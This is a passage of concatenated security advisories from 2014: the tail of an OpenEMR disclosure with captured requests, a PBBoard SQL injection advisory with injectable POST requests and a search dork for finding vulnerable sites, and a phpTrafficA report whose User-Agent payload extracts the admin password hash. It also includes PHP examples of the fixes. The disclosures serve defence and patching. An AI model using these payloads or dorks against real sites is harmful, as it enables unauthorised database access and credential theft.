allow_health_info_ex=NO&form_ref_providerID=1&i1policy_type=12&i1subscriber_employer_postal_code=SW1A+1AA&i2plan_name=boom&i2policy_type=12&form_hipaa_notice=NO&form_migrantseasonal=5&form_i3subscriber_relationship=self&form_i3subscriber_sex=Female&form_family_size=5&i2subscriber_city=Winterville&form_phone_biz=5&form_sex=Female

Request 17

GET /openemr/interface/fax/fax_dispatch_newpid.php?p=1 HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3m910jdpv3bfed8kie9jihecn6
Connection: keep-alive

Request 18

GET /openemr/interface/patient_file/reminder/patient_reminders.php?mode=simple&patient_id=1 HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=ra3sfkvd85bjve6qjm9ouq3225

Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5462/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.


PBBoard CMS SQL Injection

Vulnerability title: SQL Injection in PBBoard CMS
CVE: CVE-2014-9215
CMS: PBBoard
Vendor: Power bulletin board - http://www.pbboard.info/
Product: http://sourceforge.net/projects/pbboard/files/PBBoard_v3.0.1/PBBoard_v3.0.1.zip/download
Affected version: Version 3.0.1 (updated on 13/09/2014) and before.
Fixed version: Version 3.0.1 (updated on 28/11/2014)
Google dork: intext:Powered By PBBoard
Reported by: Tran Dinh Tien - tien.d.tran@itas.vn 
Credits to ITAS Team - www.itas.vn
 
 
:: DESCRIPTION ::
 
Multiple SQL injection vulnerabilities have been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as usernames and password hashes stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection.
 
:: DETAILS :: Attack vector
 
Link 1: 
 
POST /index.php?page=register&checkemail=1 HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.org/index.php?page=register&index=1&agree=1
Content-Length: 29
Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
 
email=<SQL Injection Here>&ajax=1
 
 
Link 2:
 
POST /index.php?page=forget&start=1 HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/index.php?page=forget&index=1
Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
 
code=0ae4e&email=<SQL Injection Here>&submit_forget=Save
 
 
Link 3: 
 
POST /index.php?page=forget&send_active_code=1 HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/index.php?page=forget&active_member=1&send_active_code=1
Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
 
code=13709&email=<SQL Injection Here>&submit_active_code=Save
 
 
:: CODE DETAIL ::
 
- Vulnerable parameter:  email
- Vulnerable file:       includes/functions.class.php
- Vulnerable function:   CheckEmail($email)
 
- Vulnerable code: 
  function CheckEmail($email)
  {
    return preg_match('#^[a-z0-9.!\#$%&\'*+-/=?^_`{|}~]+@([0-9.]+|([^\s\'"<>@,;]+\.+[a-z]{2,6}))$#si', $email) ? true : false;
  }
 
- Fix code: 
  function CheckEmail($email)
  {
    // First, we check that there's one @ symbol, and that the lengths are right
    if (!preg_match("/^[^@]{1,64}@[^@]{1,255}$/", $email)) {
      // Email invalid because wrong number of characters in one section, or wrong number of @ symbols.
      return false;
    }

    if (@strstr($email,'"')
      or @strstr($email,"'")
      or @strstr($email,'>')
      or @strstr($email,'<')
      or @strstr($email,'*')
      or @strstr($email,'%')
      or @strstr($email,'$')
      or @strstr($email,'#')
      or @strstr($email,'+')
      or @strstr($email,'^')
      or @strstr($email,'&')
      or @strstr($email,',')
      or @strstr($email,'~')
      or @strstr($email,'!')
      or @strstr($email,'{')
      or @strstr($email,'}')
      or @strstr($email,'(')
      or @strstr($email,')')
      or @strstr($email,'/'))
    {
      return false;
    }
    // Split it into sections to make life easier
    $email_array = explode("@", $email);
    $local_array = explode(".", $email_array[0]);
    for ($i = 0; $i < sizeof($local_array); $i++) {
      if (!preg_match("/^(([A-Za-z0-9!#$%&'*+\/=?^_`{|}~-][A-Za-z0-9!#$%&'*+\/=?^_`{|}~\.-]{0,63})|(\"[^(\\|\")]{0,62}\"))$/", $local_array[$i])) {
        return false;
      }
    }
    if (!preg_match("/^\[?[0-9\.]+\]?$/", $email_array[1])) { // Check if domain is IP. If not, it should be valid domain name
      $domain_array = explode(".", $email_array[1]);
      if (sizeof($domain_array) < 2) {
        return false; // Not enough parts to domain
      }
      for ($i = 0; $i < sizeof($domain_array); $i++) {
        if (!preg_match("/^(([A-Za-z0-9][A-Za-z0-9-]{0,61}[A-Za-z0-9])|([A-Za-z0-9]+))$/", $domain_array[$i])) {
          return false;
        }
      }
    }

    return true;
  }
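As an added example (not PBBoard's own code), both validators from the advisory, with their quoting reconstructed, run against a constructed address that carries a single quote, the character the injected email parameter depends on. Validation only narrows what reaches the query; the lookup that consumes the email still has to bind it as a parameter to be safe.

```php
<?php
declare(strict_types=1);

// Added example, not PBBoard code. Both validators from the advisory are
// run against a constructed address carrying a single quote.

// Version 3.0.1 regex (quoting reconstructed): the single quote sits inside
// the allowed local-part class, so a quote-bearing address passes.
function checkEmailOriginal(string $email): bool
{
    return preg_match(
        '#^[a-z0-9.!\#$%&\'*+-/=?^_`{|}~]+@([0-9.]+|([^\s\'"<>@,;]+\.+[a-z]{2,6}))$#si',
        $email
    ) === 1;
}

// Patched validator (release of 28/11/2014): length check, metacharacter
// blacklist, then per-label checks of the local part and the domain.
function checkEmailPatched(string $email): bool
{
    // Exactly one @, with 1-64 characters before it and 1-255 after it.
    if (!preg_match('/^[^@]{1,64}@[^@]{1,255}$/', $email)) {
        return false;
    }
    // The blacklist from the patch; the quote characters are what matter here.
    $blacklist = ['"', "'", '>', '<', '*', '%', '$', '#', '+', '^', '&',
                  ',', '~', '!', '{', '}', '(', ')', '/'];
    foreach ($blacklist as $bad) {
        if (strpos($email, $bad) !== false) {
            return false;
        }
    }
    [$local, $domain] = explode('@', $email);
    foreach (explode('.', $local) as $label) {
        if (!preg_match("/^(([A-Za-z0-9!#$%&'*+\/=?^_`{|}~-][A-Za-z0-9!#$%&'*+\/=?^_`{|}~\.-]{0,63})|(\"[^(\\|\")]{0,62}\"))$/", $label)) {
            return false;
        }
    }
    // A bare or bracketed IPv4 literal is accepted as-is; otherwise every
    // domain label must be a valid hostname label and there must be two.
    if (!preg_match('/^\[?[0-9\.]+\]?$/', $domain)) {
        $labels = explode('.', $domain);
        if (count($labels) < 2) {
            return false;
        }
        foreach ($labels as $label) {
            if (!preg_match('/^(([A-Za-z0-9][A-Za-z0-9-]{0,61}[A-Za-z0-9])|([A-Za-z0-9]+))$/', $label)) {
                return false;
            }
        }
    }
    return true;
}

// Constructed inputs: one benign address, one with a quote in the local part.
function compareValidators(): array
{
    $results = [];
    foreach (['user@example.com', "x'@example.com"] as $email) {
        $results[$email] = [
            'original' => checkEmailOriginal($email),
            'patched'  => checkEmailPatched($email),
        ];
    }
    return $results;
}

// user@example.com passes both validators; x'@example.com passes the
// original regex and is rejected by the patched one.
print_r(compareValidators());
```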
 
 
 
:: SOLUTION ::
Version 3.0.1 (updated on 28/11/2014)
 
:: DISCLOSURE ::
- 11/27/2014: Inform the vendor
- 11/28/2014: Vendor confirmed
- 11/28/2014: Vendor releases patch
- 12/01/2014: ITAS Team publishes information
 
::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn).
 
:: DISCLAIMER ::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
 
:: REFERENCE ::
- http://www.itas.vn/news/ITAS-Team-discovered-SQL-Injection-in-PBBoard-CMS-68.html
- https://www.youtube.com/watch?v=AQiGvH5xrJg


phpTrafficA SQL injection

Product: phpTrafficA
Product page: http://soft.zoneo.net/phpTrafficA/
Affected versions: Up to and including 2.3 (latest as of writing).
 
Description:
An SQL injection exists in Php/Functions/log_function.php, line 933:
$sql3 ="INSERT INTO `${table}_host` SET date='$date', host='',
hostname='', page='$page', ref='$cleanref', agent='$agent',
longIP='$iplong'";
 
The $agent variable comes directly from $_SERVER['HTTP_USER_AGENT'],
without any escaping. This makes SQL injection possible. Even if
multiple statements in one query has been turned off, the contents of
the database can still be read by manipulating the last parameter of the
query (the IPv4-address stored as an integer). For example, the
following spoofed user agent will store the ASCII-value of the second
character of the admin hash as its IP:
Firefox', longIP=(SELECT ASCII(SUBSTRING(value,2,1)) FROM
phpTrafficA_conf WHERE variable='adminpassword') #
This will be displayed in the "Latest visitors > Details" section, and
by repeating this procedure multiple times, the entire admin hash (or
any other database content) can be retrieved.
 
Partial mitigations:
- Turn off "multiple statements in one query".
- Hide "Latest visitors > Details" section from view. This prevents
the attacker from obtaining the output of the manipulated query.
- Apply this quick fix to line 933:
$sql3 ="INSERT INTO `${table}_host` SET date='$date', host='',
hostname='', page='$page', ref='$cleanref',
agent='".mysql_real_escape_string($agent)."', longIP='$iplong'";
 
The code-fix does not resolve the SQL injection for all server
configurations, but should be sufficient for most. A proper fix would be
a version of phpTrafficA that uses PDO with prepared statements.
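The proper fix described above, as an added example that is not phpTrafficA's own code: the line-933 INSERT rewritten as a PDO prepared statement and exercised against an in-memory SQLite stand-in with the spoofed User-Agent quoted earlier. Assumed: the `logs` table prefix, the column list, and the portable INSERT ... VALUES form in place of the MySQL-only INSERT ... SET.

```php
<?php
declare(strict_types=1);

// Added example, not phpTrafficA code: the line-933 INSERT as a PDO prepared
// statement. Table prefix, column list and the SQLite stand-in are assumptions.

function insertHostRow(PDO $db, string $table, array $row): void
{
    // Identifiers cannot be bound. The prefix comes from configuration, not
    // from the request, but restrict it to a safe alphabet anyway.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
        throw new InvalidArgumentException("unexpected table name: $table");
    }
    // page, ref, agent and longIP are all request-derived; each is bound as a
    // parameter, so a quote in the User-Agent can never close the literal.
    $stmt = $db->prepare(
        "INSERT INTO `{$table}_host` (date, host, hostname, page, ref, agent, longIP)
         VALUES (:date, '', '', :page, :ref, :agent, :longIP)"
    );
    $stmt->execute([
        ':date'   => $row['date'],
        ':page'   => $row['page'],
        ':ref'    => $row['ref'],
        ':agent'  => $row['agent'],
        ':longIP' => $row['longIP'],
    ]);
}

// Constructed fixture mirroring the two tables the advisory names.
function setupDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE `phpTrafficA_conf` (variable TEXT, value TEXT)');
    $db->exec("INSERT INTO `phpTrafficA_conf` VALUES ('adminpassword', 'deadbeef')");
    $db->exec('CREATE TABLE `logs_host` (date TEXT, host TEXT, hostname TEXT, '
            . 'page TEXT, ref TEXT, agent TEXT, longIP INTEGER)');
    return $db;
}

// Logs one hit with the advisory's spoofed User-Agent and returns the stored row.
function demo(): array
{
    $db = setupDb();
    $clientIp = ip2long('192.0.2.10');   // constructed client address
    $agent = "Firefox', longIP=(SELECT ASCII(SUBSTRING(value,2,1)) FROM "
           . "phpTrafficA_conf WHERE variable='adminpassword') #";
    insertHostRow($db, 'logs', [
        'date'   => '2014-12-01',
        'page'   => '/index.php',
        'ref'    => '',
        'agent'  => $agent,
        'longIP' => $clientIp,
    ]);
    $row = $db->query('SELECT agent, longIP FROM `logs_host`')->fetch(PDO::FETCH_ASSOC);
    // With binding, agent holds the whole spoofed string as plain data and
    // longIP is still the client address, not a byte of the admin hash.
    $row['longIP_is_client'] = ((int) $row['longIP'] === $clientIp);
    return $row;
}

print_r(demo());
```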
 
 
Best regards,
Daniel Geerts

